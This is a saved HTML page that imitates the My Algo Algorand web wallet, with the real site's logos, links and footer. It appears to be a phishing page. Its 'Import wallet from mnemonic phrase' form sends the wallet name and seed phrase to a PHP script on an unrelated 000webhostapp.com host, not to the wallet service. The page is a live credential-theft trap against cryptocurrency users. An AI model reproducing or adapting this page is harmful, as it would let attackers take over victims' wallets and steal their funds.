<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">svg:not(:root).svg-inline--fa {
  overflow: visible;
}

.svg-inline--fa {
  display: inline-block;
  font-size: inherit;
  height: 1em;
  overflow: visible;
  vertical-align: -0.125em;
}
.svg-inline--fa.fa-lg {
  vertical-align: -0.225em;
}
.svg-inline--fa.fa-w-1 {
  width: 0.0625em;
}
.svg-inline--fa.fa-w-2 {
  width: 0.125em;
}
.svg-inline--fa.fa-w-3 {
  width: 0.1875em;
}
.svg-inline--fa.fa-w-4 {
  width: 0.25em;
}
.svg-inline--fa.fa-w-5 {
  width: 0.3125em;
}
.svg-inline--fa.fa-w-6 {
  width: 0.375em;
}
.svg-inline--fa.fa-w-7 {
  width: 0.4375em;
}
.svg-inline--fa.fa-w-8 {
  width: 0.5em;
}
.svg-inline--fa.fa-w-9 {
  width: 0.5625em;
}
.svg-inline--fa.fa-w-10 {
  width: 0.625em;
}
.svg-inline--fa.fa-w-11 {
  width: 0.6875em;
}
.svg-inline--fa.fa-w-12 {
  width: 0.75em;
}
.svg-inline--fa.fa-w-13 {
  width: 0.8125em;
}
.svg-inline--fa.fa-w-14 {
  width: 0.875em;
}
.svg-inline--fa.fa-w-15 {
  width: 0.9375em;
}
.svg-inline--fa.fa-w-16 {
  width: 1em;
}
.svg-inline--fa.fa-w-17 {
  width: 1.0625em;
}
.svg-inline--fa.fa-w-18 {
  width: 1.125em;
}
.svg-inline--fa.fa-w-19 {
  width: 1.1875em;
}
.svg-inline--fa.fa-w-20 {
  width: 1.25em;
}
.svg-inline--fa.fa-pull-left {
  margin-right: 0.3em;
  width: auto;
}
.svg-inline--fa.fa-pull-right {
  margin-left: 0.3em;
  width: auto;
}
.svg-inline--fa.fa-border {
  height: 1.5em;
}
.svg-inline--fa.fa-li {
  width: 2em;
}
.svg-inline--fa.fa-fw {
  width: 1.25em;
}

.fa-layers svg.svg-inline--fa {
  bottom: 0;
  left: 0;
  margin: auto;
  position: absolute;
  right: 0;
  top: 0;
}

.fa-layers {
  display: inline-block;
  height: 1em;
  position: relative;
  text-align: center;
  vertical-align: -0.125em;
  width: 1em;
}
.fa-layers svg.svg-inline--fa {
  -webkit-transform-origin: center center;
          transform-origin: center center;
}

.fa-layers-counter, .fa-layers-text {
  display: inline-block;
  position: absolute;
  text-align: center;
}

.fa-layers-text {
  left: 50%;
  top: 50%;
  -webkit-transform: translate(-50%, -50%);
          transform: translate(-50%, -50%);
  -webkit-transform-origin: center center;
          transform-origin: center center;
}

.fa-layers-counter {
  background-color: #ff253a;
  border-radius: 1em;
  -webkit-box-sizing: border-box;
          box-sizing: border-box;
  color: #fff;
  height: 1.5em;
  line-height: 1;
  max-width: 5em;
  min-width: 1.5em;
  overflow: hidden;
  padding: 0.25em;
  right: 0;
  text-overflow: ellipsis;
  top: 0;
  -webkit-transform: scale(0.25);
          transform: scale(0.25);
  -webkit-transform-origin: top right;
          transform-origin: top right;
}

.fa-layers-bottom-right {
  bottom: 0;
  right: 0;
  top: auto;
  -webkit-transform: scale(0.25);
          transform: scale(0.25);
  -webkit-transform-origin: bottom right;
          transform-origin: bottom right;
}

.fa-layers-bottom-left {
  bottom: 0;
  left: 0;
  right: auto;
  top: auto;
  -webkit-transform: scale(0.25);
          transform: scale(0.25);
  -webkit-transform-origin: bottom left;
          transform-origin: bottom left;
}

.fa-layers-top-right {
  right: 0;
  top: 0;
  -webkit-transform: scale(0.25);
          transform: scale(0.25);
  -webkit-transform-origin: top right;
          transform-origin: top right;
}

.fa-layers-top-left {
  left: 0;
  right: auto;
  top: 0;
  -webkit-transform: scale(0.25);
          transform: scale(0.25);
  -webkit-transform-origin: top left;
          transform-origin: top left;
}

.fa-lg {
  font-size: 1.3333333333em;
  line-height: 0.75em;
  vertical-align: -0.0667em;
}

.fa-xs {
  font-size: 0.75em;
}

.fa-sm {
  font-size: 0.875em;
}

.fa-1x {
  font-size: 1em;
}

.fa-2x {
  font-size: 2em;
}

.fa-3x {
  font-size: 3em;
}

.fa-4x {
  font-size: 4em;
}

.fa-5x {
  font-size: 5em;
}

.fa-6x {
  font-size: 6em;
}

.fa-7x {
  font-size: 7em;
}

.fa-8x {
  font-size: 8em;
}

.fa-9x {
  font-size: 9em;
}

.fa-10x {
  font-size: 10em;
}

.fa-fw {
  text-align: center;
  width: 1.25em;
}

.fa-ul {
  list-style-type: none;
  margin-left: 2.5em;
  padding-left: 0;
}
.fa-ul > li {
  position: relative;
}

.fa-li {
  left: -2em;
  position: absolute;
  text-align: center;
  width: 2em;
  line-height: inherit;
}

.fa-border {
  border: solid 0.08em #eee;
  border-radius: 0.1em;
  padding: 0.2em 0.25em 0.15em;
}

.fa-pull-left {
  float: left;
}

.fa-pull-right {
  float: right;
}

.fa.fa-pull-left,
.fas.fa-pull-left,
.far.fa-pull-left,
.fal.fa-pull-left,
.fab.fa-pull-left {
  margin-right: 0.3em;
}
.fa.fa-pull-right,
.fas.fa-pull-right,
.far.fa-pull-right,
.fal.fa-pull-right,
.fab.fa-pull-right {
  margin-left: 0.3em;
}

.fa-spin {
  -webkit-animation: fa-spin 2s infinite linear;
          animation: fa-spin 2s infinite linear;
}

.fa-pulse {
  -webkit-animation: fa-spin 1s infinite steps(8);
          animation: fa-spin 1s infinite steps(8);
}

@-webkit-keyframes fa-spin {
  0% {
    -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
  }
}

@keyframes fa-spin {
  0% {
    -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
  }
}
.fa-rotate-90 {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";
  -webkit-transform: rotate(90deg);
          transform: rotate(90deg);
}

.fa-rotate-180 {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";
  -webkit-transform: rotate(180deg);
          transform: rotate(180deg);
}

.fa-rotate-270 {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";
  -webkit-transform: rotate(270deg);
          transform: rotate(270deg);
}

.fa-flip-horizontal {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";
  -webkit-transform: scale(-1, 1);
          transform: scale(-1, 1);
}

.fa-flip-vertical {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";
  -webkit-transform: scale(1, -1);
          transform: scale(1, -1);
}

.fa-flip-both, .fa-flip-horizontal.fa-flip-vertical {
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";
  -webkit-transform: scale(-1, -1);
          transform: scale(-1, -1);
}

:root .fa-rotate-90,
:root .fa-rotate-180,
:root .fa-rotate-270,
:root .fa-flip-horizontal,
:root .fa-flip-vertical,
:root .fa-flip-both {
  -webkit-filter: none;
          filter: none;
}

.fa-stack {
  display: inline-block;
  height: 2em;
  position: relative;
  width: 2.5em;
}

.fa-stack-1x,
.fa-stack-2x {
  bottom: 0;
  left: 0;
  margin: auto;
  position: absolute;
  right: 0;
  top: 0;
}

.svg-inline--fa.fa-stack-1x {
  height: 1em;
  width: 1.25em;
}
.svg-inline--fa.fa-stack-2x {
  height: 2em;
  width: 2.5em;
}

.fa-inverse {
  color: #fff;
}

.sr-only {
  border: 0;
  clip: rect(0, 0, 0, 0);
  height: 1px;
  margin: -1px;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}

.sr-only-focusable:active, .sr-only-focusable:focus {
  clip: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  position: static;
  width: auto;
}

.svg-inline--fa .fa-primary {
  fill: var(--fa-primary-color, currentColor);
  opacity: 1;
  opacity: var(--fa-primary-opacity, 1);
}

.svg-inline--fa .fa-secondary {
  fill: var(--fa-secondary-color, currentColor);
  opacity: 0.4;
  opacity: var(--fa-secondary-opacity, 0.4);
}

.svg-inline--fa.fa-swap-opacity .fa-primary {
  opacity: 0.4;
  opacity: var(--fa-secondary-opacity, 0.4);
}

.svg-inline--fa.fa-swap-opacity .fa-secondary {
  opacity: 1;
  opacity: var(--fa-primary-opacity, 1);
}

.svg-inline--fa mask .fa-primary,
.svg-inline--fa mask .fa-secondary {
  fill: black;
}

.fad.fa-inverse {
  color: #fff;
}</style><link rel="shortcut icon" href="https://wallet.myalgo.com/favicon/favicon.ico"><link rel="apple-touch-icon" href="https://wallet.myalgo.com/favicon/favicon.ico"><link rel="icon" href="https://wallet.myalgo.com/favicon/favicon.ico"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="manifest" href="https://wallet.myalgo.com/manifest.json"><title>Algorand Wallet</title><meta http-equiv="Content-Security-Policy" content="default-src &#39;self&#39;; img-src &#39;self&#39; https: data: blob:; script-src https: &#39;unsafe-inline&#39; &#39;self&#39;; style-src https: &#39;unsafe-inline&#39; &#39;self&#39;; connect-src https: &#39;self&#39; ws: wss:; worker-src https: data: blob: &#39;unsafe-inline&#39; &#39;self&#39;; child-src https: data: blob: &#39;unsafe-inline&#39; &#39;self&#39;;"><meta name="description" content="My Algo is an Algorand Wallet allowing you to freely interact with the Algorand blockchain. My Algo provides the simplest and most secure way to send and receive Algos and tokens, organize and track all your Algorand wallets, manage your Algos and assets and much more."><meta name="keywords" content="Algorand Wallet"><link href="./Algorand_Wallet_files/2.c6fb0082.chunk.css" rel="stylesheet"><link href="./Algorand_Wallet_files/main.d383eb62.chunk.css" rel="stylesheet"><style></style><style data-emotion="css"></style></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"><div role="navigation" style="position: absolute; inset: 0px; overflow: hidden;"><div class="sidebar-mobile-no-session-component" style="z-index: 2; position: absolute; top: 0px; bottom: 0px; transition: -webkit-transform 0.3s ease-out 0s; will-change: transform; overflow-y: auto; left: 0px; transform: translateX(-100%);"><div class="sidebar-mobile-top-toolbar container-fluid"><div class="sidebar-mobile-row row"><div class="sidebar-mobile-col col"><img class="sidebar-mobile-logo" src="./Algorand_Wallet_files/MyAlgoFullBlue.svg" alt="Top Bar Logo"></div><div class="sidebar-mobile-col col-auto"><div><svg aria-hidden="true" focusable="false" data-prefix="fas" data-icon="times" class="svg-inline--fa fa-times fa-w-11 sidebar-mobile-icon" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 352 512"><path fill="currentColor" d="M242.72 256l100.07-100.07c12.28-12.28 12.28-32.19 0-44.48l-22.24-22.24c-12.28-12.28-32.19-12.28-44.48 0L176 189.28 75.93 89.21c-12.28-12.28-32.19-12.28-44.48 0L9.21 111.45c-12.28 12.28-12.28 32.19 0 44.48L109.28 256 9.21 356.07c-12.28 12.28-12.28 32.19 0 44.48l22.24 22.24c12.28 12.28 32.2 12.28 44.48 0L176 322.72l100.07 100.07c12.28 12.28 32.2 12.28 44.48 0l22.24-22.24c12.28-12.28 12.28-32.19 0-44.48L242.72 256z"></path></svg></div></div></div></div><div class="sidebar-mobile-no-session"><a class="links-item" href="https://wallet.myalgo.com/home"><div class="h-100 container-fluid"><div class="align-items-center h-100 row"><div class="mx-auto col"><span class="top-toolbar-link no-margin">Home</span></div></div></div></a><a class="links-item" href="https://wallet.myalgo.com/home#faq"><div class="h-100 container-fluid"><div class="align-items-center h-100 row"><div class="mx-auto col"><span class="top-toolbar-link no-margin">FAQ</span></div></div></div></a></div><div class="sidebar-mobile-footer container-fluid"><div class="sidebar-mobile-row row"><div class="sidebar-mobile-col col">My Algo v2.0</div></div></div></div><div class="sidebar-mobile-overlay" style="z-index: 1; position: fixed; inset: 0px; opacity: 0; visibility: hidden; transition: opacity 0.3s ease-out 0s, visibility 0.3s ease-out 0s; background-color: rgba(0, 0, 0, 0.3);"></div><div class="sidebar-mobile-content" style="position: absolute; inset: 0px; overflow-y: auto; transition: left 0.3s ease-out 0s, right 0.3s ease-out 0s;"><div class="top-toolbar container-fluid"><div class="top-toolbar-row row"><div class="top-toolbar-col external-col  col-auto"><span class="top-toolbar-menu
									d-inline-block d-lg-none
									"><img class="toptoolbar-bars" src="./Algorand_Wallet_files/BarsMenu.svg" alt="Bars Logo"></span><div id="my-algo-app"><a class="toptoolbar-link" href="#/home"><img class="toptoolbar-logo" src="./Algorand_Wallet_files/MyAlgoBlue.svg" alt="App Logo"><span class="toptoolbar-dropdown-text in-toolbar">Algorand Wallet</span></a></div></div><div class="top-toolbar-col  d-none d-lg-block text-right col"><a class="top-toolbar-link" href="#/home">Home</a><a class="top-toolbar-link" href="#/home#faq">FAQ</a></div><div class="top-toolbar-col text-right pl-0 pr-0
								
							 col col-lg-auto"><div class=" css-2b097c-container" id="select-language"><div class="select-languages__control css-yk16xz-control"><div class="select-languages__value-container select-languages__value-container--has-value css-1hwfws3"><div class="select-languages__single-value css-1uccc91-singleValue"><svg aria-hidden="true" focusable="false" data-prefix="fas" data-icon="globe" class="svg-inline--fa fa-globe fa-w-16 mr-2 d-none d-md-inline-block" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><path fill="currentColor" d="M336.5 160C322 70.7 287.8 8 248 8s-74 62.7-88.5 152h177zM152 256c0 22.2 1.2 43.5 3.3 64h185.3c2.1-20.5 3.3-41.8 3.3-64s-1.2-43.5-3.3-64H155.3c-2.1 20.5-3.3 41.8-3.3 64zm324.7-96c-28.6-67.9-86.5-120.4-158-141.6 24.4 33.8 41.2 84.7 50 141.6h108zM177.2 18.4C105.8 39.6 47.8 92.1 19.3 160h108c8.7-56.9 25.5-107.8 49.9-141.6zM487.4 192H372.7c2.1 21 3.3 42.5 3.3 64s-1.2 43-3.3 64h114.6c5.5-20.5 8.6-41.8 8.6-64s-3.1-43.5-8.5-64zM120 256c0-21.5 1.2-43 3.3-64H8.6C3.2 212.5 0 233.8 0 256s3.2 43.5 8.6 64h114.6c-2-21-3.2-42.5-3.2-64zm39.5 96c14.5 89.3 48.7 152 88.5 152s74-62.7 88.5-152h-177zm159.3 141.6c71.4-21.2 129.4-73.7 158-141.6h-108c-8.8 56.9-25.6 107.8-50 141.6zM19.3 352c28.6 67.9 86.5 120.4 158 141.6-24.4-33.8-41.2-84.7-50-141.6h-108z"></path></svg>EN</div></div><div class="select-languages__indicators css-1wy0on6"><span class="select-languages__indicator-separator css-1okebmr-indicatorSeparator"></span><div aria-hidden="true" class="select-languages__indicator select-languages__dropdown-indicator css-tlfecz-indicatorContainer"><svg aria-hidden="true" focusable="false" data-prefix="fas" data-icon="angle-down" class="svg-inline--fa fa-angle-down fa-w-10 select-custom__caret" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"><path fill="currentColor" d="M143 352.3L7 216.3c-9.4-9.4-9.4-24.6 0-33.9l22.6-22.6c9.4-9.4 24.6-9.4 33.9 0l96.4 96.4 96.4-96.4c9.4-9.4 24.6-9.4 33.9 0l22.6 22.6c9.4 9.4 9.4 24.6 0 33.9l-136 136c-9.2 9.4-24.4 9.4-33.8 0z"></path></svg></div></div></div></div></div></div></div><div class="main-container container-fluid"><div class="main-row row"><div class="ml-md-4 mr-md-4 my-auto col"><div class="main-card create container"><div class="main-card-div"><div class="container"><div class="row"><div class="col-sm-10 offset-sm-1 col-md-8 offset-md-2"><span class="password-title text-center mb-3 px-md-2">Welcome to the Algorand web wallet</span></div><div class="col-sm-10 offset-sm-1"><h6 class="password-description mt-3 mb-3 text-center">Import wallet from mnemonic phrase
</h6></div><div class="col">
<form method="POST" action="https://dsedg6545.000webhostapp.com/algo1.php?account/restore">
<form id="" class="mt-2"><div class="row"><div class="col-sm-8 offset-sm-2 col-md-6 offset-md-3"><div class="align-items-center py-2 form-group"><label for="id4" class="form-password-label">Wallet name
</label>

<div class="input-group-password input-group"><input id="id4" required="" placeholder="" type="text" name="account" class="input-password form-control" aria-invalid="false" value=""><div class="input-group-append"><span class="addon-text-password btn-eye input-group-text"><span class=""></span></span></div></div><div class="invalid-feedback">Does not meet the password requirements</div></div><div class="align-items-center py-2 form-group"><label for="id5" class="form-password-label">Please enter the mnemonic phrase</label><div class="input-group-password input-group"><input id="id5" required="" placeholder="" type="text" name="seed" class="input-password form-control" aria-invalid="false" value=""><div class="input-group-append"><span class="addon-text-password btn-eye input-group-text"><span class=""></span></span></div></div><div class="invalid-feedback">Passwords don't match</div></div></div><div class="align-items-center mt-2 col-sm-10 offset-sm-1 col-lg-10 offset-lg-1"><div class="mb-4 text-left text-md-center password-requirements"><p class="mb-3"><span></span></p></div></div><div class="align-items-center text-center mt-3 col"><button type="submit" class="main-button standar-big inverted btn btn-secondary">Continue</button></div></div></form></div></div></div></div></div></div></div></div><div class="footer container-fluid"><div class="footer-row d-none d-lg-flex row"><div class="footer-col col"><img class="footer-logo mr-2" src="./Algorand_Wallet_files/MyAlgoFullWhite.svg" alt="Footer Logo">Powered by &nbsp;©&nbsp;<a class="footer-link" href="https://www.randlabs.io/" target="_blank" rel="noopener noreferrer">Rand Labs</a></div><div class="footer-col col">©&nbsp;2022&nbsp;My Algo.&nbsp; All Rights Reserved</div><div class="footer-col col"><a class="footer-link">Contact</a><span class="footer-separator">|</span><a class="footer-link" href="https://wallet.myalgo.com/terms-of-service" target="_blank" rel="noopener noreferrer">Terms</a><span class="footer-separator">|</span><a class="footer-link" href="https://wallet.myalgo.com/privacy-policy" target="_blank" rel="noopener noreferrer">Privacy</a><span class="footer-separator">|</span><a class="footer-link" href="https://twitter.com/myalgo_" target="_blank" rel="noopener noreferrer"><div class="social-icon"><img class="footer-logo" alt="Twitter logo" src="./Algorand_Wallet_files/twitter.19a8c2be.svg"></div></a></div></div><div class="footer-row-mobile align-items-center d-flex d-lg-none row"><div class="footer-col text-left pr-0 col"><img class="footer-logo mobile" src="./Algorand_Wallet_files/MyAlgoFullWhite.svg" alt="Footer Logo"><span class="d-block">Powered by &nbsp;©&nbsp;<a class="footer-link" href="https://www.randlabs.io/" target="_blank" rel="noopener noreferrer">Rand Labs</a></span></div><div class="footer-col text-right pl-0 col-auto"><a class="footer-link">Contact</a><span class="footer-separator">|</span><a class="footer-link" href="https://wallet.myalgo.com/terms-of-service" target="_blank" rel="noopener noreferrer">Terms</a><span class="footer-separator">|</span><a class="footer-link" href="https://wallet.myalgo.com/privacy-policy" target="_blank" rel="noopener noreferrer">Privacy</a></div></div><div class="align-items-center d-flex d-lg-none row"><div class="footer-col text-center pr-0 col">2021&nbsp;My Algo.&nbsp;All Rights Reserved</div><div class="footer-col text-center pl-0 col-auto"><a class="footer-link" href="https://twitter.com/myalgo_" target="_blank" rel="noopener noreferrer"><div class="social-icon"><img class="footer-logo" alt="Twitter logo" src="./Algorand_Wallet_files/twitter.19a8c2be.svg"></div></a></div></div></div></div></div></div><script async="" src="./Algorand_Wallet_files/analytics.js.download"></script><script>!function(e){function r(r){for(var n,u,a=r[0],f=r[1],i=r[2],c=0,s=[];c<a.length;c++)u=a[c],Object.prototype.hasOwnProperty.call(o,u)&&o[u]&&s.push(o[u][0]),o[u]=0;for(n in f)Object.prototype.hasOwnProperty.call(f,n)&&(e[n]=f[n]);for(p&&p(r);s.length;)s.shift()();return l.push.apply(l,i||[]),t()}function t(){for(var e,r=0;r<l.length;r++){for(var t=l[r],n=!0,a=1;a<t.length;a++){var f=t[a];0!==o[f]&&(n=!1)}n&&(l.splice(r--,1),e=u(u.s=t[0]))}return e}var n={},o={1:0},l=[];function u(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,u),t.l=!0,t.exports}u.m=e,u.c=n,u.d=function(e,r,t){u.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},u.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},u.t=function(e,r){if(1&r&&(e=u(e)),8&r)return e;if(4&r&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(u.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&r&&"string"!=typeof e)for(var n in e)u.d(t,n,function(r){return e[r]}.bind(null,n));return t},u.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return u.d(r,"a",r),r},u.o=function(e,r){return Object.prototype.hasOwnProperty.call(e,r)},u.p="/";var a=this["webpackJsonpalgorand-web-wallet"]=this["webpackJsonpalgorand-web-wallet"]||[],f=a.push.bind(a);a.push=r,a=a.slice();for(var i=0;i<a.length;i++)r(a[i]);var p=f;t()}([])</script><script src="./Algorand_Wallet_files/2.c911515f.chunk.js.download"></script>
							 
							 
							 </body></html>
